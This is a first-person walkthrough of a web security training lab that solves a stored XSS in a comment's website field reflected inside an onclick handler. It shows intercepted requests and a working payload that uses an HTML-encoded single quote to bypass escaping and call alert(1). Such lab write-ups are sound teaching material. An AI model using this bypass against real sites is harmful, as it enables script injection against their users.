Stored XSS into onclick event with angle brackets and double quotes HTML encoded and single quotes and backslash escaped

Description

This lab contains a stored cross-site scripting vulnerability in the comment functionality.

To solve this lab, submit a comment that calls the alert function when the comment author name is clicked.

Approach

After accessing the lab, I intercepted the comment request and sent it to the repeater for further analysis:

POST /post/comment HTTP/2
Host: 0ac300bf04bf2317827a0249002000ab.web-security-academy.net
Cookie: session=VjQOdUB2b45cJ6jfJSl4RrXes9RWIPib
...

csrf=NGqNLV4eLjLYN0gbzjyuNOnqrgLezHzL&postId=9&comment=qwe&name=ichyaboy&email=qwe%40qwe.com&website=http://ichyaboy.com

I noticed that my URL input data was reflected inside an onclick event handler:

<a id="author" href="http://ichyaboy.com" onclick="var tracker={track(){}};tracker.track('http://ichyaboy.com');">

I tried injecting a simple XSS payload directly, but it resulted in an error stating "Invalid website." This meant that the URL input needed to maintain a valid format. To exploit this, I decided to close the track function’s parameter, terminate the current statement, and inject my payload, commenting out the remainder to avoid syntax errors.

Here is the approach I used:

1. Close the track function parameter with ').

2. Terminate the statement with ;.

3. Inject the payload.

4. Comment out the rest with //.

Thus, the payload structure is:

http://ichyaboy.com');PAYLAOD//

To perform an alert as required by the lab:

http://ichyaboy.com');alert(1)//

Since the application escapes single quotes ('), I used HTML encoding to represent the single quote as '. Additionally, because & could be interpreted as a parameter separator in a URL, I URL-encoded the entire string. The final payload looks like this:

http://ichyaboy.com%26apos;);alert(1);//

Here is the complete request with the final payload:

POST /post/comment HTTP/2
Host: 0ac300bf04bf2317827a0249002000ab.web-security-academy.net
Cookie: session=5OsdBKIf72aWqZuZ3fJqoUnNdgf3FaOh
...

csrf=Le4UaXgzS8El2s9IkhX1JINbuI5YvY49&postId=3&comment=qwe&name=qwe&email=qwe%40qwe.qwe.com&website=http://ichyaboy.com%26apos;);alert(1);//

After submitting the comment with the crafted payload, I navigated back to the post and clicked on the comment author's name. This action triggered the XSS, and an alert box popped up, indicating the lab was solved successfully.